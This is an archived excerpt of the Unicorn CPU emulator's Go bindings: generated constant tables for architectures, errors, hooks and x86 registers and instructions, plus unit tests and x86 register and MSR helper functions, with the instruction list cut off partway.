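		return 0, err
	}
	return mu.RegRead(X86_REG_ECX) // expect 7
}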
AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.go] const ( API_MAJOR = 2 API_MINOR = 1 API_PATCH = 0 API_EXTRA = 255 VERSION_MAJOR = 2 VERSION_MINOR = 1 VERSION_PATCH = 0 VERSION_EXTRA = 255 SECOND_SCALE = 1000000 MILISECOND_SCALE = 1000 ARCH_ARM = 1 ARCH_ARM64 = 2 ARCH_MIPS = 3 ARCH_X86 = 4 ARCH_PPC = 5 ARCH_SPARC = 6 ARCH_M68K = 7 ARCH_RISCV = 8 ARCH_S390X = 9 ARCH_TRICORE = 10 ARCH_MAX = 11 MODE_LITTLE_ENDIAN = 0 MODE_BIG_ENDIAN = 1073741824 MODE_ARM = 0 MODE_THUMB = 16 MODE_MCLASS = 32 MODE_V8 = 64 MODE_ARMBE8 = 1024 MODE_ARM926 = 128 MODE_ARM946 = 256 MODE_ARM1176 = 512 MODE_MICRO = 16 MODE_MIPS3 = 32 MODE_MIPS32R6 = 64 MODE_MIPS32 = 4 MODE_MIPS64 = 8 MODE_16 = 2 MODE_32 = 4 MODE_64 = 8 MODE_PPC32 = 4 MODE_PPC64 = 8 MODE_QPX = 16 MODE_SPARC32 = 4 MODE_SPARC64 = 8 MODE_V9 = 16 MODE_RISCV32 = 4 MODE_RISCV64 = 8 ERR_OK = 0 ERR_NOMEM = 1 ERR_ARCH = 2 ERR_HANDLE = 3 ERR_MODE = 4 ERR_VERSION = 5 ERR_READ_UNMAPPED = 6 ERR_WRITE_UNMAPPED = 7 ERR_FETCH_UNMAPPED = 8 ERR_HOOK = 9 ERR_INSN_INVALID = 10 ERR_MAP = 11 ERR_WRITE_PROT = 12 ERR_READ_PROT = 13 ERR_FETCH_PROT = 14 ERR_ARG = 15 ERR_READ_UNALIGNED = 16 ERR_WRITE_UNALIGNED = 17 ERR_FETCH_UNALIGNED = 18 ERR_HOOK_EXIST = 19 ERR_RESOURCE = 20 ERR_EXCEPTION = 21 ERR_OVERFLOW = 22 MEM_READ = 16 MEM_WRITE = 17 MEM_FETCH = 18 MEM_READ_UNMAPPED = 19 MEM_WRITE_UNMAPPED = 20 MEM_FETCH_UNMAPPED = 21 MEM_WRITE_PROT = 22 MEM_READ_PROT = 23 MEM_FETCH_PROT = 24 MEM_READ_AFTER = 25 TCG_OP_SUB = 0 TCG_OP_FLAG_CMP = 1 TCG_OP_FLAG_DIRECT = 2 HOOK_INTR = 1 HOOK_INSN = 2 HOOK_CODE = 4 HOOK_BLOCK = 8 HOOK_MEM_READ_UNMAPPED = 16 HOOK_MEM_WRITE_UNMAPPED = 32 HOOK_MEM_FETCH_UNMAPPED = 64 HOOK_MEM_READ_PROT = 128 HOOK_MEM_WRITE_PROT = 256 HOOK_MEM_FETCH_PROT = 512 HOOK_MEM_READ = 1024 HOOK_MEM_WRITE = 2048 HOOK_MEM_FETCH = 4096 HOOK_MEM_READ_AFTER = 8192 HOOK_INSN_INVALID = 16384 HOOK_EDGE_GENERATED = 32768 HOOK_TCG_OPCODE = 65536 HOOK_TLB_FILL = 131072 HOOK_MEM_UNMAPPED = 112 HOOK_MEM_PROT = 896 HOOK_MEM_READ_INVALID = 144 HOOK_MEM_WRITE_INVALID = 288 HOOK_MEM_FETCH_INVALID = 576 HOOK_MEM_INVALID = 1008 HOOK_MEM_VALID = 7168 QUERY_MODE = 1 QUERY_PAGE_SIZE = 2 QUERY_ARCH = 3 QUERY_TIMEOUT = 4 CTL_IO_NONE = 0 CTL_IO_WRITE = 1 CTL_IO_READ = 2 CTL_IO_READ_WRITE = 3 TLB_CPU = 0 TLB_VIRTUAL = 1 CTL_UC_MODE = 0 CTL_UC_PAGE_SIZE = 1 CTL_UC_ARCH = 2 CTL_UC_TIMEOUT = 3 CTL_UC_USE_EXITS = 4 CTL_UC_EXITS_CNT = 5 CTL_UC_EXITS = 6 CTL_CPU_MODEL = 7 CTL_TB_REQUEST_CACHE = 8 CTL_TB_REMOVE_CACHE = 9 CTL_TB_FLUSH = 10 CTL_TLB_FLUSH = 11 CTL_TLB_TYPE = 12 CTL_TCG_BUFFER_SIZE = 13 CTL_CONTEXT_MODE = 14 PROT_NONE = 0 PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 PROT_ALL = 7 CTL_CONTEXT_CPU = 1 CTL_CONTEXT_MEMORY = 2 )unicorn-2.1.1/bindings/go/unicorn/unicorn_test.go000066400000000000000000000027271467524106700221360ustar00rootroot00000000000000package unicorn import ( "testing" ) func TestMemUnmap(t *testing.T) { mu, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } if err := mu.MemMap(0x1000, 0x1000); err != nil { t.Fatal(err) } tmp := make([]byte, 1024) if err := mu.MemWrite(0x1000, tmp); err != nil { t.Fatal(err) } if err := mu.MemUnmap(0x1000, 0x1000); err != nil { t.Fatal(err) } if err := mu.MemWrite(0x1000, tmp); err.(UcError) != ERR_WRITE_UNMAPPED { t.Fatalf("Expected ERR_WRITE_UNMAPPED, got: %v", err) } } func TestDoubleClose(t *testing.T) { mu, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } if err := mu.Close(); err != nil { t.Fatal(err) } if err := mu.Close(); err != nil { t.Fatal(err) } } func TestMemRegions(t *testing.T) { mu, err := 
NewUnicorn(ARCH_X86, MODE_32)
	if err != nil {
		t.Fatal(err)
	}
	err = mu.MemMap(0x1000, 0x1000)
	if err != nil {
		t.Fatal(err)
	}
	regions, err := mu.MemRegions()
	if err != nil {
		t.Fatal(err)
	}
	if len(regions) != 1 {
		t.Fatalf("returned wrong number of regions: %d != 1", len(regions))
	}
	r := regions[0]
	if r.Begin != 0x1000 || r.End != 0x1fff || r.Prot != 7 {
		t.Fatalf("incorrect region: %#v", r)
	}
}

func TestQuery(t *testing.T) {
	mu, err := NewUnicorn(ARCH_ARM, MODE_THUMB)
	if err != nil {
		t.Fatal(err)
	}
	mode, err := mu.Query(QUERY_MODE)
	if err != nil {
		t.Fatal(err)
	}
	if mode != MODE_THUMB {
		t.Fatalf("query returned invalid mode: %d != %d", mode, MODE_THUMB)
	}
}
unicorn-2.1.1/bindings/go/unicorn/x86.go000066400000000000000000000024141467524106700200400ustar00rootroot00000000000000package unicorn

import (
	"unsafe"
)

// #include <unicorn/unicorn.h>
// #include <unicorn/x86.h>
import "C"

type X86Mmr struct {
	Selector uint16
	Base     uint64
	Limit    uint32
	Flags    uint32
}

func (u *uc) RegWriteMmr(reg int, value *X86Mmr) error {
	var val C.uc_x86_mmr
	val.selector = C.uint16_t(value.Selector)
	val.base = C.uint64_t(value.Base)
	val.limit = C.uint32_t(value.Limit)
	val.flags = C.uint32_t(value.Flags)
	ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val))
	return errReturn(ucerr)
}

func (u *uc) RegReadMmr(reg int) (*X86Mmr, error) {
	var val C.uc_x86_mmr
	ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val))
	ret := &X86Mmr{
		Selector: uint16(val.selector),
		Base:     uint64(val.base),
		Limit:    uint32(val.limit),
		Flags:    uint32(val.flags),
	}
	return ret, errReturn(ucerr)
}

func (u *uc) RegWriteX86Msr(reg uint64, val uint64) error {
	msr := C.uc_x86_msr{
		rid:   C.uint32_t(reg),
		value: C.uint64_t(val),
	}
	return errReturn(C.uc_reg_write(u.handle, X86_REG_MSR, unsafe.Pointer(&msr)))
}

func (u *uc) RegReadX86Msr(reg uint64) (uint64, error) {
	msr := C.uc_x86_msr{
		rid: C.uint32_t(reg),
	}
	ucerr := C.uc_reg_read(u.handle, X86_REG_MSR, unsafe.Pointer(&msr))
	return uint64(msr.value), errReturn(ucerr)
}
unicorn-2.1.1/bindings/go/unicorn/x86_const.go000066400000000000000000001076421467524106700212550ustar00rootroot00000000000000package unicorn
// For Unicorn Engine.
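// Editor's example -- hedged sketch, not upstream code: the x86-only helpers
// above drive descriptor-table registers and MSRs. The base/limit values are
// made up; 0xC0000080 is the architectural IA32_EFER MSR number.
func exampleX86SystemRegs(mu Unicorn) (uint64, error) {
	gdt := &X86Mmr{Base: 0x100000, Limit: 0x1fff}
	if err := mu.RegWriteMmr(X86_REG_GDTR, gdt); err != nil {
		return 0, err
	}
	return mu.RegReadX86Msr(0xC0000080) // read IA32_EFER back from the vCPU
}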
AUTO-GENERATED FILE, DO NOT EDIT [x86_const.go] const ( // X86 CPU CPU_X86_QEMU64 = 0 CPU_X86_PHENOM = 1 CPU_X86_CORE2DUO = 2 CPU_X86_KVM64 = 3 CPU_X86_QEMU32 = 4 CPU_X86_KVM32 = 5 CPU_X86_COREDUO = 6 CPU_X86_486 = 7 CPU_X86_PENTIUM = 8 CPU_X86_PENTIUM2 = 9 CPU_X86_PENTIUM3 = 10 CPU_X86_ATHLON = 11 CPU_X86_N270 = 12 CPU_X86_CONROE = 13 CPU_X86_PENRYN = 14 CPU_X86_NEHALEM = 15 CPU_X86_WESTMERE = 16 CPU_X86_SANDYBRIDGE = 17 CPU_X86_IVYBRIDGE = 18 CPU_X86_HASWELL = 19 CPU_X86_BROADWELL = 20 CPU_X86_SKYLAKE_CLIENT = 21 CPU_X86_SKYLAKE_SERVER = 22 CPU_X86_CASCADELAKE_SERVER = 23 CPU_X86_COOPERLAKE = 24 CPU_X86_ICELAKE_CLIENT = 25 CPU_X86_ICELAKE_SERVER = 26 CPU_X86_DENVERTON = 27 CPU_X86_SNOWRIDGE = 28 CPU_X86_KNIGHTSMILL = 29 CPU_X86_OPTERON_G1 = 30 CPU_X86_OPTERON_G2 = 31 CPU_X86_OPTERON_G3 = 32 CPU_X86_OPTERON_G4 = 33 CPU_X86_OPTERON_G5 = 34 CPU_X86_EPYC = 35 CPU_X86_DHYANA = 36 CPU_X86_EPYC_ROME = 37 CPU_X86_ENDING = 38 // X86 registers X86_REG_INVALID = 0 X86_REG_AH = 1 X86_REG_AL = 2 X86_REG_AX = 3 X86_REG_BH = 4 X86_REG_BL = 5 X86_REG_BP = 6 X86_REG_BPL = 7 X86_REG_BX = 8 X86_REG_CH = 9 X86_REG_CL = 10 X86_REG_CS = 11 X86_REG_CX = 12 X86_REG_DH = 13 X86_REG_DI = 14 X86_REG_DIL = 15 X86_REG_DL = 16 X86_REG_DS = 17 X86_REG_DX = 18 X86_REG_EAX = 19 X86_REG_EBP = 20 X86_REG_EBX = 21 X86_REG_ECX = 22 X86_REG_EDI = 23 X86_REG_EDX = 24 X86_REG_EFLAGS = 25 X86_REG_EIP = 26 X86_REG_ES = 28 X86_REG_ESI = 29 X86_REG_ESP = 30 X86_REG_FPSW = 31 X86_REG_FS = 32 X86_REG_GS = 33 X86_REG_IP = 34 X86_REG_RAX = 35 X86_REG_RBP = 36 X86_REG_RBX = 37 X86_REG_RCX = 38 X86_REG_RDI = 39 X86_REG_RDX = 40 X86_REG_RIP = 41 X86_REG_RSI = 43 X86_REG_RSP = 44 X86_REG_SI = 45 X86_REG_SIL = 46 X86_REG_SP = 47 X86_REG_SPL = 48 X86_REG_SS = 49 X86_REG_CR0 = 50 X86_REG_CR1 = 51 X86_REG_CR2 = 52 X86_REG_CR3 = 53 X86_REG_CR4 = 54 X86_REG_CR8 = 58 X86_REG_DR0 = 66 X86_REG_DR1 = 67 X86_REG_DR2 = 68 X86_REG_DR3 = 69 X86_REG_DR4 = 70 X86_REG_DR5 = 71 X86_REG_DR6 = 72 X86_REG_DR7 = 73 X86_REG_FP0 = 82 X86_REG_FP1 = 83 X86_REG_FP2 = 84 X86_REG_FP3 = 85 X86_REG_FP4 = 86 X86_REG_FP5 = 87 X86_REG_FP6 = 88 X86_REG_FP7 = 89 X86_REG_K0 = 90 X86_REG_K1 = 91 X86_REG_K2 = 92 X86_REG_K3 = 93 X86_REG_K4 = 94 X86_REG_K5 = 95 X86_REG_K6 = 96 X86_REG_K7 = 97 X86_REG_MM0 = 98 X86_REG_MM1 = 99 X86_REG_MM2 = 100 X86_REG_MM3 = 101 X86_REG_MM4 = 102 X86_REG_MM5 = 103 X86_REG_MM6 = 104 X86_REG_MM7 = 105 X86_REG_R8 = 106 X86_REG_R9 = 107 X86_REG_R10 = 108 X86_REG_R11 = 109 X86_REG_R12 = 110 X86_REG_R13 = 111 X86_REG_R14 = 112 X86_REG_R15 = 113 X86_REG_ST0 = 114 X86_REG_ST1 = 115 X86_REG_ST2 = 116 X86_REG_ST3 = 117 X86_REG_ST4 = 118 X86_REG_ST5 = 119 X86_REG_ST6 = 120 X86_REG_ST7 = 121 X86_REG_XMM0 = 122 X86_REG_XMM1 = 123 X86_REG_XMM2 = 124 X86_REG_XMM3 = 125 X86_REG_XMM4 = 126 X86_REG_XMM5 = 127 X86_REG_XMM6 = 128 X86_REG_XMM7 = 129 X86_REG_XMM8 = 130 X86_REG_XMM9 = 131 X86_REG_XMM10 = 132 X86_REG_XMM11 = 133 X86_REG_XMM12 = 134 X86_REG_XMM13 = 135 X86_REG_XMM14 = 136 X86_REG_XMM15 = 137 X86_REG_XMM16 = 138 X86_REG_XMM17 = 139 X86_REG_XMM18 = 140 X86_REG_XMM19 = 141 X86_REG_XMM20 = 142 X86_REG_XMM21 = 143 X86_REG_XMM22 = 144 X86_REG_XMM23 = 145 X86_REG_XMM24 = 146 X86_REG_XMM25 = 147 X86_REG_XMM26 = 148 X86_REG_XMM27 = 149 X86_REG_XMM28 = 150 X86_REG_XMM29 = 151 X86_REG_XMM30 = 152 X86_REG_XMM31 = 153 X86_REG_YMM0 = 154 X86_REG_YMM1 = 155 X86_REG_YMM2 = 156 X86_REG_YMM3 = 157 X86_REG_YMM4 = 158 X86_REG_YMM5 = 159 X86_REG_YMM6 = 160 X86_REG_YMM7 = 161 X86_REG_YMM8 = 162 X86_REG_YMM9 = 163 X86_REG_YMM10 = 164 X86_REG_YMM11 = 165 X86_REG_YMM12 = 166 
X86_REG_YMM13 = 167 X86_REG_YMM14 = 168 X86_REG_YMM15 = 169 X86_REG_YMM16 = 170 X86_REG_YMM17 = 171 X86_REG_YMM18 = 172 X86_REG_YMM19 = 173 X86_REG_YMM20 = 174 X86_REG_YMM21 = 175 X86_REG_YMM22 = 176 X86_REG_YMM23 = 177 X86_REG_YMM24 = 178 X86_REG_YMM25 = 179 X86_REG_YMM26 = 180 X86_REG_YMM27 = 181 X86_REG_YMM28 = 182 X86_REG_YMM29 = 183 X86_REG_YMM30 = 184 X86_REG_YMM31 = 185 X86_REG_ZMM0 = 186 X86_REG_ZMM1 = 187 X86_REG_ZMM2 = 188 X86_REG_ZMM3 = 189 X86_REG_ZMM4 = 190 X86_REG_ZMM5 = 191 X86_REG_ZMM6 = 192 X86_REG_ZMM7 = 193 X86_REG_ZMM8 = 194 X86_REG_ZMM9 = 195 X86_REG_ZMM10 = 196 X86_REG_ZMM11 = 197 X86_REG_ZMM12 = 198 X86_REG_ZMM13 = 199 X86_REG_ZMM14 = 200 X86_REG_ZMM15 = 201 X86_REG_ZMM16 = 202 X86_REG_ZMM17 = 203 X86_REG_ZMM18 = 204 X86_REG_ZMM19 = 205 X86_REG_ZMM20 = 206 X86_REG_ZMM21 = 207 X86_REG_ZMM22 = 208 X86_REG_ZMM23 = 209 X86_REG_ZMM24 = 210 X86_REG_ZMM25 = 211 X86_REG_ZMM26 = 212 X86_REG_ZMM27 = 213 X86_REG_ZMM28 = 214 X86_REG_ZMM29 = 215 X86_REG_ZMM30 = 216 X86_REG_ZMM31 = 217 X86_REG_R8B = 218 X86_REG_R9B = 219 X86_REG_R10B = 220 X86_REG_R11B = 221 X86_REG_R12B = 222 X86_REG_R13B = 223 X86_REG_R14B = 224 X86_REG_R15B = 225 X86_REG_R8D = 226 X86_REG_R9D = 227 X86_REG_R10D = 228 X86_REG_R11D = 229 X86_REG_R12D = 230 X86_REG_R13D = 231 X86_REG_R14D = 232 X86_REG_R15D = 233 X86_REG_R8W = 234 X86_REG_R9W = 235 X86_REG_R10W = 236 X86_REG_R11W = 237 X86_REG_R12W = 238 X86_REG_R13W = 239 X86_REG_R14W = 240 X86_REG_R15W = 241 X86_REG_IDTR = 242 X86_REG_GDTR = 243 X86_REG_LDTR = 244 X86_REG_TR = 245 X86_REG_FPCW = 246 X86_REG_FPTAG = 247 X86_REG_MSR = 248 X86_REG_MXCSR = 249 X86_REG_FS_BASE = 250 X86_REG_GS_BASE = 251 X86_REG_FLAGS = 252 X86_REG_RFLAGS = 253 X86_REG_FIP = 254 X86_REG_FCS = 255 X86_REG_FDP = 256 X86_REG_FDS = 257 X86_REG_FOP = 258 X86_REG_ENDING = 259 // X86 instructions X86_INS_INVALID = 0 X86_INS_AAA = 1 X86_INS_AAD = 2 X86_INS_AAM = 3 X86_INS_AAS = 4 X86_INS_FABS = 5 X86_INS_ADC = 6 X86_INS_ADCX = 7 X86_INS_ADD = 8 X86_INS_ADDPD = 9 X86_INS_ADDPS = 10 X86_INS_ADDSD = 11 X86_INS_ADDSS = 12 X86_INS_ADDSUBPD = 13 X86_INS_ADDSUBPS = 14 X86_INS_FADD = 15 X86_INS_FIADD = 16 X86_INS_FADDP = 17 X86_INS_ADOX = 18 X86_INS_AESDECLAST = 19 X86_INS_AESDEC = 20 X86_INS_AESENCLAST = 21 X86_INS_AESENC = 22 X86_INS_AESIMC = 23 X86_INS_AESKEYGENASSIST = 24 X86_INS_AND = 25 X86_INS_ANDN = 26 X86_INS_ANDNPD = 27 X86_INS_ANDNPS = 28 X86_INS_ANDPD = 29 X86_INS_ANDPS = 30 X86_INS_ARPL = 31 X86_INS_BEXTR = 32 X86_INS_BLCFILL = 33 X86_INS_BLCI = 34 X86_INS_BLCIC = 35 X86_INS_BLCMSK = 36 X86_INS_BLCS = 37 X86_INS_BLENDPD = 38 X86_INS_BLENDPS = 39 X86_INS_BLENDVPD = 40 X86_INS_BLENDVPS = 41 X86_INS_BLSFILL = 42 X86_INS_BLSI = 43 X86_INS_BLSIC = 44 X86_INS_BLSMSK = 45 X86_INS_BLSR = 46 X86_INS_BOUND = 47 X86_INS_BSF = 48 X86_INS_BSR = 49 X86_INS_BSWAP = 50 X86_INS_BT = 51 X86_INS_BTC = 52 X86_INS_BTR = 53 X86_INS_BTS = 54 X86_INS_BZHI = 55 X86_INS_CALL = 56 X86_INS_CBW = 57 X86_INS_CDQ = 58 X86_INS_CDQE = 59 X86_INS_FCHS = 60 X86_INS_CLAC = 61 X86_INS_CLC = 62 X86_INS_CLD = 63 X86_INS_CLFLUSH = 64 X86_INS_CLFLUSHOPT = 65 X86_INS_CLGI = 66 X86_INS_CLI = 67 X86_INS_CLTS = 68 X86_INS_CLWB = 69 X86_INS_CMC = 70 X86_INS_CMOVA = 71 X86_INS_CMOVAE = 72 X86_INS_CMOVB = 73 X86_INS_CMOVBE = 74 X86_INS_FCMOVBE = 75 X86_INS_FCMOVB = 76 X86_INS_CMOVE = 77 X86_INS_FCMOVE = 78 X86_INS_CMOVG = 79 X86_INS_CMOVGE = 80 X86_INS_CMOVL = 81 X86_INS_CMOVLE = 82 X86_INS_FCMOVNBE = 83 X86_INS_FCMOVNB = 84 X86_INS_CMOVNE = 85 X86_INS_FCMOVNE = 86 X86_INS_CMOVNO = 87 X86_INS_CMOVNP = 88 X86_INS_FCMOVNU = 89 
X86_INS_CMOVNS = 90 X86_INS_CMOVO = 91 X86_INS_CMOVP = 92 X86_INS_FCMOVU = 93 X86_INS_CMOVS = 94 X86_INS_CMP = 95 X86_INS_CMPPD = 96 X86_INS_CMPPS = 97 X86_INS_CMPSB = 98 X86_INS_CMPSD = 99 X86_INS_CMPSQ = 100 X86_INS_CMPSS = 101 X86_INS_CMPSW = 102 X86_INS_CMPXCHG16B = 103 X86_INS_CMPXCHG = 104 X86_INS_CMPXCHG8B = 105 X86_INS_COMISD = 106 X86_INS_COMISS = 107 X86_INS_FCOMP = 108 X86_INS_FCOMPI = 109 X86_INS_FCOMI = 110 X86_INS_FCOM = 111 X86_INS_FCOS = 112 X86_INS_CPUID = 113 X86_INS_CQO = 114 X86_INS_CRC32 = 115 X86_INS_CVTDQ2PD = 116 X86_INS_CVTDQ2PS = 117 X86_INS_CVTPD2DQ = 118 X86_INS_CVTPD2PS = 119 X86_INS_CVTPS2DQ = 120 X86_INS_CVTPS2PD = 121 X86_INS_CVTSD2SI = 122 X86_INS_CVTSD2SS = 123 X86_INS_CVTSI2SD = 124 X86_INS_CVTSI2SS = 125 X86_INS_CVTSS2SD = 126 X86_INS_CVTSS2SI = 127 X86_INS_CVTTPD2DQ = 128 X86_INS_CVTTPS2DQ = 129 X86_INS_CVTTSD2SI = 130 X86_INS_CVTTSS2SI = 131 X86_INS_CWD = 132 X86_INS_CWDE = 133 X86_INS_DAA = 134 X86_INS_DAS = 135 X86_INS_DATA16 = 136 X86_INS_DEC = 137 X86_INS_DIV = 138 X86_INS_DIVPD = 139 X86_INS_DIVPS = 140 X86_INS_FDIVR = 141 X86_INS_FIDIVR = 142 X86_INS_FDIVRP = 143 X86_INS_DIVSD = 144 X86_INS_DIVSS = 145 X86_INS_FDIV = 146 X86_INS_FIDIV = 147 X86_INS_FDIVP = 148 X86_INS_DPPD = 149 X86_INS_DPPS = 150 X86_INS_RET = 151 X86_INS_ENCLS = 152 X86_INS_ENCLU = 153 X86_INS_ENTER = 154 X86_INS_EXTRACTPS = 155 X86_INS_EXTRQ = 156 X86_INS_F2XM1 = 157 X86_INS_LCALL = 158 X86_INS_LJMP = 159 X86_INS_FBLD = 160 X86_INS_FBSTP = 161 X86_INS_FCOMPP = 162 X86_INS_FDECSTP = 163 X86_INS_FEMMS = 164 X86_INS_FFREE = 165 X86_INS_FICOM = 166 X86_INS_FICOMP = 167 X86_INS_FINCSTP = 168 X86_INS_FLDCW = 169 X86_INS_FLDENV = 170 X86_INS_FLDL2E = 171 X86_INS_FLDL2T = 172 X86_INS_FLDLG2 = 173 X86_INS_FLDLN2 = 174 X86_INS_FLDPI = 175 X86_INS_FNCLEX = 176 X86_INS_FNINIT = 177 X86_INS_FNOP = 178 X86_INS_FNSTCW = 179 X86_INS_FNSTSW = 180 X86_INS_FPATAN = 181 X86_INS_FPREM = 182 X86_INS_FPREM1 = 183 X86_INS_FPTAN = 184 X86_INS_FFREEP = 185 X86_INS_FRNDINT = 186 X86_INS_FRSTOR = 187 X86_INS_FNSAVE = 188 X86_INS_FSCALE = 189 X86_INS_FSETPM = 190 X86_INS_FSINCOS = 191 X86_INS_FNSTENV = 192 X86_INS_FXAM = 193 X86_INS_FXRSTOR = 194 X86_INS_FXRSTOR64 = 195 X86_INS_FXSAVE = 196 X86_INS_FXSAVE64 = 197 X86_INS_FXTRACT = 198 X86_INS_FYL2X = 199 X86_INS_FYL2XP1 = 200 X86_INS_MOVAPD = 201 X86_INS_MOVAPS = 202 X86_INS_ORPD = 203 X86_INS_ORPS = 204 X86_INS_VMOVAPD = 205 X86_INS_VMOVAPS = 206 X86_INS_XORPD = 207 X86_INS_XORPS = 208 X86_INS_GETSEC = 209 X86_INS_HADDPD = 210 X86_INS_HADDPS = 211 X86_INS_HLT = 212 X86_INS_HSUBPD = 213 X86_INS_HSUBPS = 214 X86_INS_IDIV = 215 X86_INS_FILD = 216 X86_INS_IMUL = 217 X86_INS_IN = 218 X86_INS_INC = 219 X86_INS_INSB = 220 X86_INS_INSERTPS = 221 X86_INS_INSERTQ = 222 X86_INS_INSD = 223 X86_INS_INSW = 224 X86_INS_INT = 225 X86_INS_INT1 = 226 X86_INS_INT3 = 227 X86_INS_INTO = 228 X86_INS_INVD = 229 X86_INS_INVEPT = 230 X86_INS_INVLPG = 231 X86_INS_INVLPGA = 232 X86_INS_INVPCID = 233 X86_INS_INVVPID = 234 X86_INS_IRET = 235 X86_INS_IRETD = 236 X86_INS_IRETQ = 237 X86_INS_FISTTP = 238 X86_INS_FIST = 239 X86_INS_FISTP = 240 X86_INS_UCOMISD = 241 X86_INS_UCOMISS = 242 X86_INS_VCOMISD = 243 X86_INS_VCOMISS = 244 X86_INS_VCVTSD2SS = 245 X86_INS_VCVTSI2SD = 246 X86_INS_VCVTSI2SS = 247 X86_INS_VCVTSS2SD = 248 X86_INS_VCVTTSD2SI = 249 X86_INS_VCVTTSD2USI = 250 X86_INS_VCVTTSS2SI = 251 X86_INS_VCVTTSS2USI = 252 X86_INS_VCVTUSI2SD = 253 X86_INS_VCVTUSI2SS = 254 X86_INS_VUCOMISD = 255 X86_INS_VUCOMISS = 256 X86_INS_JAE = 257 X86_INS_JA = 258 X86_INS_JBE = 259 X86_INS_JB = 260 
X86_INS_JCXZ = 261 X86_INS_JECXZ = 262 X86_INS_JE = 263 X86_INS_JGE = 264 X86_INS_JG = 265 X86_INS_JLE = 266 X86_INS_JL = 267 X86_INS_JMP = 268 X86_INS_JNE = 269 X86_INS_JNO = 270 X86_INS_JNP = 271 X86_INS_JNS = 272 X86_INS_JO = 273 X86_INS_JP = 274 X86_INS_JRCXZ = 275 X86_INS_JS = 276 X86_INS_KANDB = 277 X86_INS_KANDD = 278 X86_INS_KANDNB = 279 X86_INS_KANDND = 280 X86_INS_KANDNQ = 281 X86_INS_KANDNW = 282 X86_INS_KANDQ = 283 X86_INS_KANDW = 284 X86_INS_KMOVB = 285 X86_INS_KMOVD = 286 X86_INS_KMOVQ = 287 X86_INS_KMOVW = 288 X86_INS_KNOTB = 289 X86_INS_KNOTD = 290 X86_INS_KNOTQ = 291 X86_INS_KNOTW = 292 X86_INS_KORB = 293 X86_INS_KORD = 294 X86_INS_KORQ = 295 X86_INS_KORTESTB = 296 X86_INS_KORTESTD = 297 X86_INS_KORTESTQ = 298 X86_INS_KORTESTW = 299 X86_INS_KORW = 300 X86_INS_KSHIFTLB = 301 X86_INS_KSHIFTLD = 302 X86_INS_KSHIFTLQ = 303 X86_INS_KSHIFTLW = 304 X86_INS_KSHIFTRB = 305 X86_INS_KSHIFTRD = 306 X86_INS_KSHIFTRQ = 307 X86_INS_KSHIFTRW = 308 X86_INS_KUNPCKBW = 309 X86_INS_KXNORB = 310 X86_INS_KXNORD = 311 X86_INS_KXNORQ = 312 X86_INS_KXNORW = 313 X86_INS_KXORB = 314 X86_INS_KXORD = 315 X86_INS_KXORQ = 316 X86_INS_KXORW = 317 X86_INS_LAHF = 318 X86_INS_LAR = 319 X86_INS_LDDQU = 320 X86_INS_LDMXCSR = 321 X86_INS_LDS = 322 X86_INS_FLDZ = 323 X86_INS_FLD1 = 324 X86_INS_FLD = 325 X86_INS_LEA = 326 X86_INS_LEAVE = 327 X86_INS_LES = 328 X86_INS_LFENCE = 329 X86_INS_LFS = 330 X86_INS_LGDT = 331 X86_INS_LGS = 332 X86_INS_LIDT = 333 X86_INS_LLDT = 334 X86_INS_LMSW = 335 X86_INS_OR = 336 X86_INS_SUB = 337 X86_INS_XOR = 338 X86_INS_LODSB = 339 X86_INS_LODSD = 340 X86_INS_LODSQ = 341 X86_INS_LODSW = 342 X86_INS_LOOP = 343 X86_INS_LOOPE = 344 X86_INS_LOOPNE = 345 X86_INS_RETF = 346 X86_INS_RETFQ = 347 X86_INS_LSL = 348 X86_INS_LSS = 349 X86_INS_LTR = 350 X86_INS_XADD = 351 X86_INS_LZCNT = 352 X86_INS_MASKMOVDQU = 353 X86_INS_MAXPD = 354 X86_INS_MAXPS = 355 X86_INS_MAXSD = 356 X86_INS_MAXSS = 357 X86_INS_MFENCE = 358 X86_INS_MINPD = 359 X86_INS_MINPS = 360 X86_INS_MINSD = 361 X86_INS_MINSS = 362 X86_INS_CVTPD2PI = 363 X86_INS_CVTPI2PD = 364 X86_INS_CVTPI2PS = 365 X86_INS_CVTPS2PI = 366 X86_INS_CVTTPD2PI = 367 X86_INS_CVTTPS2PI = 368 X86_INS_EMMS = 369 X86_INS_MASKMOVQ = 370 X86_INS_MOVD = 371 X86_INS_MOVDQ2Q = 372 X86_INS_MOVNTQ = 373 X86_INS_MOVQ2DQ = 374 X86_INS_MOVQ = 375 X86_INS_PABSB = 376 X86_INS_PABSD = 377 X86_INS_PABSW = 378 X86_INS_PACKSSDW = 379 X86_INS_PACKSSWB = 380 X86_INS_PACKUSWB = 381 X86_INS_PADDB = 382 X86_INS_PADDD = 383 X86_INS_PADDQ = 384 X86_INS_PADDSB = 385 X86_INS_PADDSW = 386 X86_INS_PADDUSB = 387 X86_INS_PADDUSW = 388 X86_INS_PADDW = 389 X86_INS_PALIGNR = 390 X86_INS_PANDN = 391 X86_INS_PAND = 392 X86_INS_PAVGB = 393 X86_INS_PAVGW = 394 X86_INS_PCMPEQB = 395 X86_INS_PCMPEQD = 396 X86_INS_PCMPEQW = 397 X86_INS_PCMPGTB = 398 X86_INS_PCMPGTD = 399 X86_INS_PCMPGTW = 400 X86_INS_PEXTRW = 401 X86_INS_PHADDSW = 402 X86_INS_PHADDW = 403 X86_INS_PHADDD = 404 X86_INS_PHSUBD = 405 X86_INS_PHSUBSW = 406 X86_INS_PHSUBW = 407 X86_INS_PINSRW = 408 X86_INS_PMADDUBSW = 409 X86_INS_PMADDWD = 410 X86_INS_PMAXSW = 411 X86_INS_PMAXUB = 412 X86_INS_PMINSW = 413 X86_INS_PMINUB = 414 X86_INS_PMOVMSKB = 415 X86_INS_PMULHRSW = 416 X86_INS_PMULHUW = 417 X86_INS_PMULHW = 418 X86_INS_PMULLW = 419 X86_INS_PMULUDQ = 420 X86_INS_POR = 421 X86_INS_PSADBW = 422 X86_INS_PSHUFB = 423 X86_INS_PSHUFW = 424 X86_INS_PSIGNB = 425 X86_INS_PSIGND = 426 X86_INS_PSIGNW = 427 X86_INS_PSLLD = 428 X86_INS_PSLLQ = 429 X86_INS_PSLLW = 430 X86_INS_PSRAD = 431 X86_INS_PSRAW = 432 X86_INS_PSRLD = 433 